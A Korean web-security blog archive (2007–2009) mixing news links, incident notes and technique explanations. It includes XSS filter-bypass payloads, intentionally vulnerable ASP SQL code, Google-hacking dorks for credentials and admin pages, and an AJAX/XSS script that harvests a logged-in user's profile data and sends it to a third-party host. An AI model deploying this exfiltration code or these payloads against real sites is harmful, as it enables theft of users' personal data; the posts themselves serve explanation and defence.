태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.

'┃ Web'에 해당되는 글 27건

  1. 2009.08.21 네이버카페를 이용한 유령광고 (2)
  2. 2009.06.12 Frontpage extension server 취약점(author.dll)
  3. 2009.04.15 코드게이트2009 웹해킹 문제
  4. 2009.04.04 zdnet iframe 삽입 페이지 발견
  5. 2009.03.06 2008 최고의 웹해킹 기술 10
  6. 2008.10.22 cookie sql injection 원리와 대안
  7. 2008.09.27 Google Doc서비스 xss 필터 bypass 기법
  8. 2008.01.07 SWF Flash 파일에 대한 다양한 XSS 취약점
  9. 2007.12.14 [링크스크랩] XSS 및 SQL injection 필터
  10. 2007.12.07 phpBB 용 해킹 방지 모듈
  11. 2007.12.01 [본문스크랩] [해킹 시연] SQL Injection을 활용한 웹 공격
  12. 2007.11.30 OWASP TOP10 2007 한글판
  13. 2007.11.29 메트로서울 홈페이지에 또 악성코드.. (1)
  14. 2007.11.28 [링크스크랩] 무료 SQL 인젝션 스캐너 15 제품 요약 정리
  15. 2007.11.17 공군 국방만 하면 되나? (개인정보 유출)
  16. 2007.11.13 CCWASS(Common Criteria Web Application Security Scoring)
  17. 2007.10.31 우리 사이트는 XSS 에 안전할까?
  18. 2007.10.27 Guidelines on Securing Public Web Servers
  19. 2007.10.24 중국 스패머의 탐색전
  20. 2007.10.23 PHP 헤더 삽입에 대한 설명글
  21. 2007.10.17 AJAX의 위력 - XmlHttpRequest를 이용하여 중요정보 빼내기
  22. 2007.10.14 구글해킹 (5)
  23. 2007.10.13 메트로서울 방문 시 악성 코드 확인.
  24. 2007.10.03 paros - 보충자료
  25. 2007.09.30 Cyber 지하드 DoS Tool
  26. 2007.08.31 암호 탐지기/크래커 - CAIN & ABEL
  27. 2007.08.31 웹 스캐너 및 구글 해킹 툴 - wikto

네이버카페를 이용한 유령광고

┃ Web 2009.08.21 14:05

벌새님이 자세히 설명해주셨습니다.

http://hummingbird.tistory.com/1305

엄청난 JQ...
Trackback 0 : Comments 2
  1. Favicon of http://boanchanggo.tistory.com BlogIcon JQ 2009.08.24 17:54 신고 Modify/Delete Reply

    요즘에 모하세요? 저는 이제 쭈욱 박으로 나갈듯 합니다.

    젠장 9월 30일 시험 보려 학교 방문해야 된다고 하네요

    • Favicon of http://suban.tistory.com BlogIcon suban 2009.08.25 14:43 신고 Modify/Delete

      나야 돌+i 들과 싸우고 있지~ ㅋㅋ
      셤보러 나도 가야하나..ㅡ,.ㅡ;

Write a comment


Frontpage extension server 취약점(author.dll)

┃ Web 2009.06.12 09:53

홈페이지 변조건을 분석하다 알아낸 정보입니다. 드문 방법으로 웹해킹을 당한 것 같은데, 제가 경험이 부족해서 그런진 몰라도 처음보므로 포스팅하여 관련자 분들께 조금이나마 도움을 드릴까 합니다.

1. 사건 개요
IIS6.0을 사용하고 있었고, 웹서버 로그를 분석해보니 /_vti_aut/author.dll 에 대한 접근 기록을 발견하였다.

2. 대응 방법
이에 author.dll를 키워드로 검색한 결과, 관련 파일은 frontpage extension server와 관련되어 있었고 다음과 같은 2가지 이유로 인한 취약점으로 웹해킹이 이루어질 수 있다는 것을 알았다.

1) 보안업데이트 미패치

-> 해결법 : 관련보안패치

(참고)

http://www.microsoft.com/korea/technet/security/bulletin/MS03-051.mspx

http://www.microsoft.com/korea/technet/security/bulletin/MS06-017.mspx

 

2) Frontpage extension server 보안설정

-> 해결법 : IIS에서 Frontpage extension server 보안설정 강화

 

 


Trackback 0 : Comment 0

Write a comment


코드게이트2009 웹해킹 문제

┃ Web 2009.04.15 11:26

http://webhacking.kr/index.php?mode=challenge

코드게이트를 참가하지 않아서 이게 예선인지 본선인지는 모르겠지만 코드게이트에서 공개한 것 같네요

문제 수준이 상당하죠? ㅎㄷㄷ;;

Trackback 0 : Comment 0

Write a comment


zdnet iframe 삽입 페이지 발견

┃ Web 2009.04.04 01:08


지디넷에서 트랜스포머2 한정판 어쩌구 저쩌구 기사에 iframe이 삽입되었네요...
카스퍼스키에서 좀비 소리를 내며 저에게 알람해주었습니다. ㅎㅎ

도메인 www.khib.com.tw/index.htm은 404가 뜨네요


www.khib.com.tw/help/index.htm 로 들어와서 소스보기 햇더니 아무 코드도 없고 달랑 한줄 끄적여 있네요.

카스퍼스키만이 트로이목마 다운로더가 탐지된다고 알려주는데 더이상 어떻게 분석을 해야하는지 이런건 공부를 해본적이 없어서...진도를 못나가겠네요 ㅎㅎ;; 와이어샤크로 패킷을 봐야하나...쩝...


글 마치고 바로 와이어샤크 돌려 봐야겟음.

※ 삭제요청 및 문제가 된다면 바로 지우겠습니다.
Trackback 0 : Comment 0

Write a comment


2008 최고의 웹해킹 기술 10

┃ Web 2009.03.06 12:53

Jeremiah Grossman이 사람들의 자신의 블로그에 Top ten web hacking techniques of 2008 (official)의 제목으로 글을 포스팅 했습니다. 그중에 GIFAR가 blackHat 2009 free pass를 획득했다고 하고,

Jeremiah Grossman의 ClickJacking도 링크되어 있네요.

아래는 그 톱10 링크입니다.

http://jeremiahgrossman.blogspot.com/2009/02/top-ten-web-hacking-techniques-of-2008.html

Trackback 0 : Comment 0

Write a comment


cookie sql injection 원리와 대안

┃ Web 2008.10.22 14:47

요즘 쿠키인젝션 화제가 대두되고 있네요
쿠키인젝션에 원리를 간단히 설명드릴까합니다.
아래는 관련 코드입니다.


' InputFilter 함수는 입력값 검증을 위한 필터링 함수
' CheckLogin 함수는 아이디/비밀번호로 로그인 체크

1. 로그인 인증 성공후 쿠키 생성
<%
Dim UserID : UserID = InputFilter(Request.Form("UserID")) ' SQL Injection방어를 위해 InputFilter사용
Dim UserPW : UserPW = InputFilter(Request.Form("UserPW"))
Dim Result : Result = CheckLogin(UserID, UserPW)
If Result = True Then
Response.Cookies("www")("userid") = UserID
Else
Response.Write "인증실패"
End If
%>

2. 게시판 글쓰기하였을때 로그인한 사용자 아이디를 Writer 필드에 저장
<%
Dim Title : Title = InputFilter(Request.Form("Title")) ' SQL Injection방어를 위해 InputFilter사용
Dim Content : Content = InputFilter(Request.Form("Content")) ' SQL Injection방어를 위해 InputFilter사용
Dim Writer : Writer = Request.Cookies("www")("userid") ' 쿠키는 그대로 가져와서 사용 <-- 이부분이 필터링을 해주지 않아 문제가 됨

SQL = "Insert Into Board ("
SQL = SQL & "Title, Content, Writer "
SQL = SQL & ") Values ( "
SQL = SQL & " '" & Title & "', '" & Content & "', '" & Writer & "') "
Db.Execute SQL ' SQL Injection에 취약함!!
%>

개발자 자신들이 만든 쿠키는 안전하다는 생각으로, 생성된 쿠키를 이용하는 필드에서는 sql injection 문을 필터링하지 않는게 문제가 된다고 합니다.
통신 중간에 쿠키를 가로채서 변조하는 것이 가능한 만큼 이 문제가 발생하게 되는 것이죠

역시 생각의 발상이 달라야 한다고 느끼는 산뜻한 기법입니다..(옹호하는게 아님..ㅡㅡ;)

대안으로는 로깅설정에서 쿠키를 설정하거나 웹나이트 같은 웹방화벽에서 쿠키로깅을 설정합니다.
이 설정은 대부분 디폴트가 언체크이기 때문에 관리자가 관심을 가져야 겠습니다.
물론 이 로깅설정에 문제점을 꼬집자면 쿠키를 저장하는 것이기 때문에 cost가 많이 들겠죠
그래서 아예 처음부터 문제발생 요지를 없애는 거죠. 어떠케?


Dim Writer : Writer = InputFileter(Request.Cookies("www")("userid"))

요렇게..

Trackback 0 : Comment 0

Write a comment


Google Doc서비스 xss 필터 bypass 기법

┃ Web 2008.09.27 13:06

저도 이제야 구글에 저런 기능이 있었는지 알았네요.
간단히 설명드리면 Doc기능은 온라인에서 문서를 생성하고 공유가 가능하게 하는 구글 온라인 애플리케이션입니다.

여기서 발견된 취약점은 xss 취약점인데 공격자가 악의적으로 생성한 문서를 다른 사람과 공유함으로써 악성 문서파일을 실행하게 하고

<IMG SRC="javascript&#010:alert('test');"> (decimal HTML entity)
<IMG SRC="javascript&#x0A;:alert('test');"> (hexadecimal HTML entity)


위와 같은 기법으로 xss 필터링을 우회한다고 합니다.

현재는 구글에서 패치가 되었다고 합니다.

저런 기법도 있구나라고 참고하시면 좋을 것 같네요.
Trackback 0 : Comment 0

Write a comment


SWF Flash 파일에 대한 다양한 XSS 취약점

┃ Web 2008.01.07 13:31

이 취약점은 상당히 많이 퍼져있는 플래쉬를 생각한다면 심각성을 느낄 수 있겠네요.

ㅎㄷㄷ;;

헐랭이님 블로그에서 퍼왔습니다.

웹 상에서 플래쉬 파일 포맷이 상당히 인기인 만큼,플래쉬 파일을 만들어주는 툴들이 많은데요. 다양한 플래쉬 개발 도구들에 의해 생성된 SWF 파일에 대한 XSS 취약점이 발표되었습니다.

취약점 상세 정보 : http://docs.google.com/View?docid=ajfxntc4dmsq_14dt57ssdw

만약 여러분 사이트에 드림위버, Adobe Acrobat Connect, InfoSoft FusionCharts, Techsmith Camtasia, Autodemo를 이용해 만들어진 SWF 파일이 있다면 위의 취약점 상세 정보를 참고하셔서 XSS 취약점을 제거하시기 바랍니다.

국내외 보안 커뮤니티에서 동영상 제작 시 Camtasia 를 많이 사용 중인 것으로 아는데요, 여러분 사이트의 동영상 강좌 중에 Camtasia 를 이용해 SWF 포맷으로 만든 파일이 있는지 확인해보시길 바랍니다.

이상의 프로그램 목록은 취약점을점검한 제품의 목록이므로, 그 외의 다른 제품군에도 이와 유사한 문제가 있을 수 있습니다.

정리:
1. 이 취약점은 SWF 파일을 올려둔 웹 사이트 담당자가 문제를 해결해줘야 합니다.
2. 일반 사용자가 웹 사이트를 접속하는 와중에 자신의 쿠키 및 세션 정보가 유출되거나, 악성 코드가 설치될 수 있습니다.

대응 방안:
1. 웹 사이트 담당자 : 위의 취약점 상세 정보를 토대로 사이트의 취약한 SWF 파일을 점검한 후, SWF 파일 개발 도구 제작사의 최신 패치를 다운받아, 각 SWF 파일을 다시 생성해주셔야 합니다.
2. 사용자 : 일단 Adobe Flash Player 를 업데이트 해주시고, 웹 사이트 접속 시 Flash 파일이 실행되지 않도록 브라우저 설정을 변경해주시는 것이 좋겠습니다.

이 취약점은장기간 여러 사이트를 고생시킬 듯 하네요.

Trackback 0 : Comment 0

Write a comment


[링크스크랩] XSS 및 SQL injection 필터

┃ Web 2007.12.14 17:26
Trackback 0 : Comment 0

Write a comment


phpBB 용 해킹 방지 모듈

┃ Web 2007.12.07 21:47
phpBB 용 보안 모듈에 대한 설명

http://www.net-security.org/article.php?id=1103
Trackback 0 : Comment 0

Write a comment


[본문스크랩] [해킹 시연] SQL Injection을 활용한 웹 공격

┃ Web 2007.12.01 13:39

SecurityPlus에서 퍼온 자료입니다.

중국에서 제작된 SQL Injection을 활용한 웹 공격의 정석을 보여 주는 동영상입니다.

먼저 공격의 대상을 선정한 다음, Wiswed 공격툴을 활용하여 SQL Injection 취약점을 탐색합니다.

다음으로 모든 링크의 검색을 통해 관리자 페이지를 알아 냅니다.

SQL Injection와 Brute Force Attack을 통해 관리자 ID와 패스워드를 알아 냅니다.

관리자 페이지로 들어간 다음, 파일 업로드 메뉴에서 자바스크립트로 구현된 업로드 속성자 제한을 푼 다음,

웹 쉘을 올려서 다음 공격을 준비하는 것까지의 시나리오입니다.

Trackback 0 : Comment 0

Write a comment


OWASP TOP10 2007 한글판

┃ Web 2007.11.30 16:53

출처 : securityplus(http://cafe.naver.com/securityplus)

웹 보안 취약성과 웹 보안 제품의 기능 요구사항의 표준을 담은 문서입니다.

시큐러티플러스에서 한글작업한 자료입니다.

맘대로 올리는거라...삭제요청시 삭제하겠습니다.

- 다운로드 -

Trackback 0 : Comment 0

Write a comment


메트로서울 홈페이지에 또 악성코드..

┃ Web 2007.11.29 10:11

출처 : http://zizihacker.egloos.com/1058010

메트로서울 홈페이지에 또 악성코드..

메트로 서울 홈페이지는 도데체 어떻게 관리는 하길래..
또 악성코드가 나왔네요...
http://210.118.94.122/n/n/1.htm<< 이넘이 악성코드 이군요...

http://www.metroseoul.co.kr/Metro.htm<< 이 속에 아래의 코드가 숨어 있습니다.


[링크스크랩] 무료 SQL 인젝션 스캐너 15 제품 요약 정리

┃ Web 2007.11.28 21:30
Trackback 0 : Comment 0

Write a comment


공군 국방만 하면 되나? (개인정보 유출)

┃ Web 2007.11.17 14:33

출처 : http://ggogun.tistory.com/entry/airforce-sec

* 꼬마군단님의 사례입니다.

공군 국방만 하면 되나? (개인정보 유출)

오늘 이 글이 등록되면 어제의 일이 될 것 입니다.

16일은 11월 공군1차 발표가 있는 날입니다.

저 또한 정보보호병을 목표로 육해군보다 시설이 좋다는 공군을 지원 했습니다.

역시 습관대로 파이어폭스를 켰습니다.

mma.go.kr 입력을 하니 역시나 메세지 하나가...


지난번에 포스팅 했던 것이 매우 후회가 되더군요.

"전자정부의 다양한 웹브라우저 존중"

우리나라가 그렇지 뭐... 하면서 그냥 확인 단추를 누르고 바로 공군 사이트로 들어갔습니다.

그리고 떨리는 발표.....

그런데 이게 왠일?

내가 아닌 이상한 사람이.....

순간 DB 오류로 잘못 나온 줄 알았습니다

그래서 다시 시도, 또 시도.....

이상해서 IE로 돌려보았습니다.

이제서야 제대로 나오네요...

일단 파이어 폭스에서 검색지원이 똑바로 안 된다는 점..

일단 여기까지는 이해를 하겠습니다.

공군 1차 합격에 매우 기쁜 마음에 통지서 출력을.. 클릭..


기분 좋은 통지서.....

그런데 개인정보가 적나라하게 나오네요....

설마 해서 파이어 폭스의 혹자의 통지서를 클릭..


헉.......

개인정보가 아주 적나라 하게 잘 나옵니다..^^;;;

일단 파폭을 쓰는 지원자라면 모두 이 사람의 신상정보를 잘 보았을 것입니다.

저는 정보보호병을 지원하므로 신상정보를 악의적으로 쓰지는 않겠습니다.!!

하지만 중요한건 다른 사람들입니다.

과연 다른 파폭 사용자들은 이러한 정보를 보고도 가만히 있을 사람이 몇일까요

몇몇은 이미 복사를 해놓고서 도용을 하고 있을지도 모릅니다.

차라리 DB가 똑바로 검색이 안 되면 아예 IE가 아니면 막아버리던지 해야지.

한 사람의 개인정보를 이렇게 쉽게 노출 시킨다는 것이 옳은 일인가요?

국방만 잘하면 되는 곳이 군이 아니라는 생각을 합니다.

군에서 가장 중요한 건 정보보호입니다.

그래서 정보보호병도 생겼다고 생각하고요..

하지만 벌써 부터 개인정보가 술술 새고 있는데, 과연 정보보호가 잘 될까요?

설마 해서 지원 소스도 보았습니다.

역시가 역시더군요..

모든 자료를 대입 시켜 놓았습니다...

아직 자바를 제대로 못 배워서 잘 모르겠지만, 이 정도라면 다른 사람 정보도 쉽게 볼수 있다고 생각합니다..

이제부터라도 다양한 브라우저를 지원하던지 아니면 검색만이라도 막아버리는 대책을 세워야 할것입니다.

위의 자료는 웹의 소스이며, 간단한 소스만 남겨두었습니다.

분석해서 더 좋은 소스를 만들었으면 합니다.^^
Trackback 0 : Comment 0

Write a comment


CCWASS(Common Criteria Web Application Security Scoring)

┃ Web 2007.11.13 01:19

출처 : http://coderant.egloos.com/3929172

CCWASS(Common Criteria Web Application Security Scoring)

CCWASS(Common Criteria Web Application Security Scoring)는 웹어플리케이션 보안수준 평가를 위한 스코어 공통평가입니다. 보안 컨설팅시 취약점 항목에 대한 Scoring이 많은 도움이 될 듯 싶네요.

[다운로드] ccwapss_1.0.pdf
Trackback 0 : Comment 0

Write a comment


우리 사이트는 XSS 에 안전할까?

┃ Web 2007.10.31 01:04

출처 : http://swbae.egloos.com/1659513

우리 사이트는 XSS 에 안전할까?

자신이 운영하는 사이트가 XSS 에 취약한지를 알려주는 XSSed.com 이라는 사이트가 등장했습니다.
이 사이트는 Zone-h.org 와 마찬가지로 누군가가 'A 사이트의 이러이러한 페이지가 XSS 에 취약해요!' 라고 보고하면 그 내용을 검토해본 후 XSS Archive 에 올리는 방식으로 운영됩니다.전체 메뉴의 구성도 Zone-h.org 를 의식적으로 흉내내려한 걸 느낄 수 있습니다.

그러면 국내 최고 포탈인 네이버를 이 사이트에서 검색해서보도록 하겠습니다.

위에서 보듯이 이미 해외의 여러 전문가들이 네이버를 점검해서 그 결과를 올려놓은 것을 보실 수 있습니다.
등록된 각엔트리를 클릭하면 다음과 같은 화면이 나타납니다.

화면을 보시면 오른쪽 상단에는 해당 취약점이 해결되었는지를 Status 로 보여주고 있고, 화면 중간에 XSS 취약점 점검 기법이 URL로 표기되어 있어, 개발담당자가 어떤 소스를 수정해야할지 파악하는데 도움을 주고 있습니다. 화면 하단은 사이트의 실제 화면을 보여주고 있습니다. 네이버의 경우 제기된 문제 중 일부 URL은 수정한 것을 확인할 수 있었으나, 여전히 많은 URL 이 XSS 에 취약한 상태더군요.

XSSed.com 사이트는자신이 운영하는사이트의 XSS 취약점을 파악하고, 제거할 수 있도록 도움을 주지만 몇 가지 단점이 있습니다.
1. 누군가가 이미 취약점을 점검해서 XSS Archive 에 등록을 요청해야만 XSS 취약점을 파악할 수 있어 '사후약방문'에 가깝다.
2. 사이트 운영자보다 다른 사람들이 먼저 취약점을 알게될 가능성이 높아, 악의적인 용도에 활용될 여지가 있다.
3. Zone-h.org 의 Archive 가 단순히 deface 된 홈페이지를 캡쳐해서 보여주는 반면, XSSed.com 의 Archive 에 등록된 취약점 점검 기법은 아주 조금만 수정해도 실제 공격에 활용할 수 있기 때문에 법적인 위험이 있다.
는 점을 들 수 있겠네요.

특히 3번째는 심각한 부분인데, XSSed.com 의 Archive 에 등록된 link 를 클릭하면 여러분의 브라우저에서 해당 사이트에 대해 XSS 취약점을 점검하게 됩니다. 여러분이야 link 를 따라 들어간 것이니 악의적인 의도가 없었음을 증명하면 법적인 책임을 면할 수 있을 것입니다. 그러나 XSSed.com 은 해당 사이트를 해킹하는 방법을 공개했다는 법적 책임을 면하기 어려울듯 합니다. 한편으론 'XSS 취약점이 발생하는 정확한 URL 과 점검 기법을 공개하지 않는다면 개발자가 어떻게 취약점을 고칠 수 있겠느냐?' 고 반론한다면, 사실 그 말도 맞는 말이라... ㅋㅋ...어려운 문제죠?

일정 규모 이상의 사이트를 운영하는 분들이라면 XSSed.com 의 등장이 분명 달갑지 않으실 텐데, 앞으로는 이렇게 대처하면 어떨까 합니다.
1. 개발 보안 프로세스를 강화하여 XSS 취약점의 발생 여지를 없앤다.
(Fortify 같은 도구를 개발 프로세스에 도입하면 더욱 편리하겠죠)
2. 주기적으로 XSS 취약점을 점검하여 XSSed.com 에 등록되기 이전에 취약점을 제거한다.
3. 보안 담당자가 매일 XSSed.com 을모니터링하여 자신의 사이트가 등록된 경우 해당 문제를 해결한다.
(XSSed.com 에 메일로 Fixed 상태로 변경해달라고 요청할지 말지는나름의 판단에 맡기겠습니다)

아참... 그리고 네이버를 예로 들었다고 '네이버 보안 수준 개판이구만~' 하는 오해는 말았으면 합니다. 국내외의 유명 사이트는 거의 전부XSSed.com 에 등록되어 있어요. 예를 들면 '야후'라던가 '다음' 이라던가, '파란'이라던가, '구글' 등등...
Trackback 0 : Comment 0

Write a comment


Guidelines on Securing Public Web Servers

┃ Web 2007.10.27 06:54

출처 : http://swbae.egloos.com/1657360

Guidelines on Securing Public Web Servers

'Guidelines on Securing Public Web Servers' 라는 제목의 NIST Special Publication 800-44 v4 (draft) 문서입니다.

웹 서버 보안 강화를 위한 절차에 대해 가이드라인을 제시하고 있는데,
- 웹 서버를 설치한 시스템의 OS 보안 강화
- 웹 서버 보안 강화
- 웹 컨텐츠 보안 강화
- 인증 및 암호화
- 네트워크 보안 강화
- 웹 서버 관리 시 고려 사항

등의 내용으로 이루어져 있습니다.

내용은 전반적으로 상식적인 내용이 많아 보안 전문가라면 재차 읽으면서 시간 낭비할 필요가 없을 듯 합니다.

아쉬운 점이라면 해당 자료에 포함된 체크 리스트가지나치게 포괄적인 내용으로 이루어져 있어, 실무에 적용하기에 무리가 있다는 점입니다.

흥미로운 부분은 'Security Testing Web Servers' 부분에 포함된 내용입니다.
진단 방법을 Vulnerability Scanning 과 Penetration Testing 으로 나누어, 각 진단 방법의 특징과 장단점을 적절히 기술하고 있습니다.

웹 취약점 진단을 받아야 하는 보안 담당자라면 해당 부분을 꼭 한번 읽어보시길 권합니다. 보안 업체에서 여러분에게 말해주지 않으려 하는 부분이 잘 나와있습니다.

Trackback 0 : Comment 0

Write a comment


중국 스패머의 탐색전

┃ Web 2007.10.24 04:32

출처 : http://theeye.pe.kr/182

* 이글은 the eye 님의 블로그 사례입니다.

중국 스패머의 탐색전


오늘 리퍼러를 보다보니 특이한 것이 남아있는것을 발견하였다. 외국의 누군가가 Google Translater를 통해 내 사이트를 본 흔적이 남아있는것이었다.

예전에도 외국의 누군가가 나의 블로그를 번역기를 통해 본것을 보았기 때문에 놀랄일도 아니지만 이번에는 좀 달랐다.

바로 발신지와 그 글의 목표가 남달랐기 때문이다. 예전 중국발 대규모 스팸 발송 대란이 있은 직후 테터툴즈/텍스트큐브 플러그인을 만들어 내놓은 적이 있었다.

여기 밑에 보일 SpamBlocker 라는것인데, 중국에서 접속하여 영어로 번역하여 이 게시글을 보았다는 것이다.

중국인이 뭣하러 테터툴즈 스팸방지 플러그인의 설명글을 읽어야 했을까? SpamBlocker를 내놓은 직후에도 계속해서 내 블로그에 스팸 공격이 있어왔고, 그것들은 완벽하게 100% 차단이 되고 있었다.

하지만 어제 이후로 공격이 끊겼다. 현재 잠잠하다는 것이다. 아마도 공격자들은 SpamBlocker의 약점을 찾아서 좀더 보완을 한 후 공격을 할려는것이 아닐까?

공격자들의 대응이 기대되기도 하고 흥분되면서도 걱정이 되는 순간이다...TNC EAS 개발자님도 마음의 준비를 해두셔야 하는 시점이 아닌가 생각해 본다.
Trackback 0 : Comment 0

Write a comment


PHP 헤더 삽입에 대한 설명글

┃ Web 2007.10.23 18:19

출처 : http://swbae.egloos.com/1655567

PHP 헤더 삽입에 대한 설명글

PHP 로 구현된 웹 사이트의 '고객문의' 기능을 악용해임의의 헤더를 삽입하는 기법에 대한 설명글 입니다.
초반부에는 임의의 mail 헤더를 삽입해 스팸에 악용하는 기법이 소개되고 있고, 후반부에는 임의의 HTTP 헤더를 삽입해 다른 사이트의 DoS 에 사용하는 기법이 소개되고 있습니다.

http://www.milw0rm.com/papers/181

Trackback 0 : Comment 0

Write a comment


AJAX의 위력 - XmlHttpRequest를 이용하여 중요정보 빼내기

┃ Web 2007.10.17 22:02

출처 : http://fullc0de.egloos.com/3307514

AJAX의 위력 - XmlHttpRequest를 이용하여 중요정보 빼내기

Web 2.0가 현재 웹 환경을 이끌어가는 큰 키워드 입니다. 그 중에서 AJAX이란 기술은 브라우저의 역할을 더욱 확대시켰죠. 보안분야에서도 변화하는 웹 트렌드에 맞게 AJAX과 Web 2.0 환경에서 발생할 수 있는 위협에 대해서 많은 논의가 되고 있습니다. 과거에 myspace.com을 타겟으로 한 Samy웜과 Sesseion Hijacking이 그 대표적인 예 입니다.

큰 의미에서 보면 XSS(Cross Site Script) 취약성이나 CSRF(Cross Site Request Fogery) 취약성을 이용하죠. 저도 이를 이용해서 하나를 만들어 봤습니다. 웹 사이트들이 AJAX 컨셉을 이용하여 발전하듯이 웹 관련 공격도 AJAX을 이용하지 말라는 법은 없겠죠? ^^;;

음.. AJAX의 큰 특징이라면 XmlHttpRequest 객체를 이용하여 브라우저의 역할을 좀 더 향상 시켰다는 점이라고 생각합니다. (맞나요? -_-;;) XmlHttpRequest를 이용하여 사이트와 통신을 하게 되는데 사용자가 브라우저를 Reload 하지 않더라도 자바스크립트를 통해 XmlHttpRequest 객체를 생성하고 필요시마다 웹 서버와 통신을 하게 되는거죠. 공격의 핵심포인트는 이 부분입니다.

XSS취약성이 존재하는 웹 사이트에서 취약성을 이용해 원격지에 있는 자바스크립트 파일을 불러오도록 합니다. 그럼 취약성에 의해서 자바스크립트 파일이 웹 사이트에 접근하는 사용자의 브라우저에서 실행되겠죠? 삽입한 스크립트 코드는 다음과 같습니다.





스크립트가 실행되면 StealerSendRequest()에 의해서 일련의 작업(?)을 시작하게 됩니다.

제가 만들어본 코드는 특정 웹 사이트에서 로그인 한 유저가 자신의 개인정보를 변경하기 위해서 변경 페이지로 갈 때 이미 기록되어 있는 정보를 빼오는 동작을 합니다. 제가 쓰고도 무슨 말인지 헛갈리는데요... ^^;; 즉, hidden 속성을 가진 값을 빼오는 것입니다. -_-;; 물론 hidden 값이 아니더라도 웹 페이지에 있는 어떠한 값이라도 가져올 수 있습니다.

간단하죠? XmlHttpRequest의 덕분이죠. ㅎㅎ

그럼 코드를 보시면 getXHR()은 XmlHttpRequest객체를 생성하는 함수 입니다.

function getXHR()
{
if(xhr!=null) return;

if(window.ActiveXObject) {
xhr = new ActiveXObject("Msxml2.XMLHTTP");
if(!xhr)
xhr = new ActiveXObject("Microsoft.XMLHTTP");
}

else if(window.XMLHttpRequest) {
xhr = new XMLHttpRequest();
}
}



다음 코드는 StealerSendRequest() 함수 입니다.

function StealerSendRequest()
{
getXHR();

xhr.onreadystatechange = hStateChange;
xhr.open("GET", "/user/user_info_modi.asp", true);
xhr.send(null);
}



이 코드에서 중요한 부분은 open() 함수 입니다.함수를 통해서버에게 개인사용자 변경 페이지인 user_info_modi.asp 파일을 요청합니다.요청에 대해서 hStateChange() 함수가 동작을 하도록 설정을 해뒀습니다. 물론 꼭 개인 사용자 변경 페이지가 아니여도 됩니다. 원하는 페이지를호출하도록 변경하면 되죠.

정상적으로 페이지가 호출된다면XmlHttpRequest 객체의 맴버인 responseText 나 responseXML등을 통해응답(Response)값을볼 수 있습니다. 제 코드에서는 XML 형태의 DOM이 아니므로 responseText를 이용하여 문자열 파싱을 했습니다.다음은 파싱코드의 일부입니다.

// searching process
var searchStr = /input.*ml_name.*value="/;
var matStr = response.match(searchStr);
var start = response.search(searchStr);
var len = start + matStr[0].length;
var token1 = response.substr(len, 30);
info[0] = token1.substr(0, token1.search(/"/));

위 파싱코드는정규표현식 /input.*ml_name.*value="/ 에 해당하는 부분을 찾은 후 이를 기준으로 원하는 스트링을 가져오는 것이죠.즉, 위 코드는 사용자 이름을 가져오기 위한 코드입니다.

이렇게 문자열을 파싱하여 원하는 정보를 info라는 배열에 담아최종적으로 제 3의 원격지에 정보를 전송합니다. 전송은 자바스크립트 내에서 Image 객체를 통해 수행했습니다.

var i=new Image(0,0);
i.src = "http://제3의원격지/fullc0de/receive.php?id="+info[1];

이렇게 설정하면 다 끝이 납니다.

물론 제가 위에서 설명드린 부분은 몇가지 조건이만족해야 하겠죠? 그 조건은 다음과 같습니다.

1.XSS취약성 포인트가 존재함.
2.로그인한 유저는 중요정보가 담긴특정 페이지에 대해 직접 접근이 가능해야함. (인증과정을 한번 더 거치면 곤란하겠죠? -_-;;)
3. 웹 페이지에 중요 정보가담겨있어야 함.. (당연함.. @_@)



공격은 유효 합니다. 스크린샷 같은 것도 함께 넣고 싶었는데.. 귀차니즘이... 죄송합니다.ㅎㅎ

국내에서도 점점 AJAX을 이용하여 웹 사이트를 만드는 사례가 증가하고 있습니다.브라우저에 이를 처리하는 스크립트와 웹 서버간에통신은 XML이나 JSON등을 보통 이용하고 있죠. 이러한 파일들은 위에서 설명한 XmlHttpRequest 객체를 통해 처리하고 있습니다. 즉, XML이나 JSON과 같은 문서가사용자의 중요정보를 담고 있다면 어떻게 될까요? 예전에화이트햇 시큐리티의 CTO인 제레미(맞나요? @_@;;)씨가 보여줬던 Gmail의contact list 빼오기도 이와 같은 맥락입니다.아! SPI Dynamics 에서 발표했던 Jikto도이 기법을 이용한 것이죠.. 후후후

새로운 환경에는 언제나 새로운 공격기법이나오기 마련인 것 같습니다. 더 재미난 것이 많이 나왔으면 좋겠네요.. 그럼 이만..

Trackback 0 : Comment 0

Write a comment


구글해킹

┃ Web 2007.10.14 17:16

출처 : http://blog.daum.net/bobodong/5246003



공격코드 찾는방법

1. 리눅스 filetype:c이용 (100개만)
root #]lynx -dump "http://www.google.com/search?q=filetype:c exploit&num=100" > exploit

찾은코드 정렬하기
root #]grep Cached exploit| awk -F" -" '{print $1}' | sort -u

2. include 이용
구글 검색창 : "#include " exploit로 검색

언어별로 소스코드 찾기(유명문자열)
asp.net(C#) Aspx ""
Visual Basic vb "Private Sub"

구글 요청문을 잘만 만들면 취약된 사이트도 발견 가능하다. 예제는 책 194페이지에 있다.

CGI 취약점 자동스캔툴
Wikto(http://www.sensepost.com/research/wikto/)
Nikto(http://www.cirt.net/code/nikto.shtml)
Gooscan(http://Johnny.ihackstuff.com)

주요 Exploit 사이트
1. packetstorm.linuxsecurity.com
2. synnergy.net
3. unsecure.altervista.org
4. www.blacksheepnetworks.com
5. www.circlemud.org
6. www.dsinet.org
7. www.metasploit.com
8. www.nostarch.com
9. www.packetstormsecurity.org
10. www.rosiello.org
11. www.safemode.org
12. www.security-corporation.com
13. www.thc.org

구글해킹 검색문 10가지

단순하면서도 잘 동작하는 검색문 10가지

1. site - 알지? 뚜리야

2. intitle:index.of
아파치 디렉토리 목록을 찾는 데 유용한다.
디렉토리 목록은 공격자에게 매우 많은 정보를 제공한다

3. error | warning
에러 메세지는 거의 모든 상황에서 유용한 정보를 제공한다.
때때로 경고 메세지가 공격대상 시스템의 내부에서 일어나고 있는 상황을 이해하기 위한 단서를 제공하곤 한다.

4. login | logon
이 요청문은 로그인 포털을 매우 효율적으로 찾는다.
사용자 이름과 도움말을 찾을 때도 쓰일 수 있다.

5. username | userid | employee.ID | "your username is"
사용자 이름 수집을 위해 가장 많이 쓰이는 요청문 중 하나이다.
이 요청문으로 사용자 이름을 찾을 수 없다 하더라도 검색 결과를 자세히 살펴보면 공격자가 추후 공격에 이용할 수 있는 절차 정보가 들어 있을 가능성이 있다.

6. password | passcode | "your password id"
인터넷에서 단어 password를 어떤 형태로 사용하는지 알려준다.
로그인 절차, 비밀번호 변경 절차, 기관에서 사용 중인 비밀번호 정책의 실마리를 알려주는 문서를 찾는다.

7. admin | administrator
